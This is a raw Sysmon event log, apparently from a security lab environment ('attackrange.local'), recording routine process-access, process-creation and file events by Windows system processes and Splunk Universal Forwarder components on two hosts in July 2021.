07:42:26.278{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805757Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F262-60EB-3079-00000000D001}1624C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805756Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.278{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F262-60EB-3079-00000000D001}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805755Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.279{0C1E0330-F262-60EB-3079-00000000D001}1624C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805754Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:26.216{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A9320FF155E77DC9EB6DA7928AF4A6F,SHA256=BA21060588E57AF608CB8FC3550B46C81C7F1F91408819F0FBFAC10C2A84C712,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:27.379{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=024788F206702B1A01457F794970CA6F,SHA256=106ABEBFD3A3C2BCBB8C35E8774AAA9A9C2B4308AF35335A594D81B83317CC76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.794{0C1E0330-F263-60EB-3279-00000000D001}292640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F263-60EB-3279-00000000D001}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F263-60EB-3279-00000000D001}292C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.653{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F263-60EB-3279-00000000D001}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.638{0C1E0330-F263-60EB-3279-00000000D001}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.325{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94EBC934F1C61B73178FB8C6C81AF357,SHA256=7C8549DCFF11065079D6DFEF916F97E60AC0E8BDC2A7C43FBE9B186C9B6E7BCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:27.122{0C1E0330-F262-60EB-3179-00000000D001}33162436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:28.379{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06EAC5C7619DA2A9444BCD9D12BD2602,SHA256=013B05B7FB13750364E1DA7587BE433DD0599F3314B463DEDE16A7E146921479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.622{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D13D78B777C32821DF5949761D286235,SHA256=575E33BCE72160CB0A547A397A5E1DD0580DD297DD26D2BA233BF9E74E57FB0A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.497{0C1E0330-F264-60EB-3379-00000000D001}416404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.357{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F264-60EB-3379-00000000D001}416C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d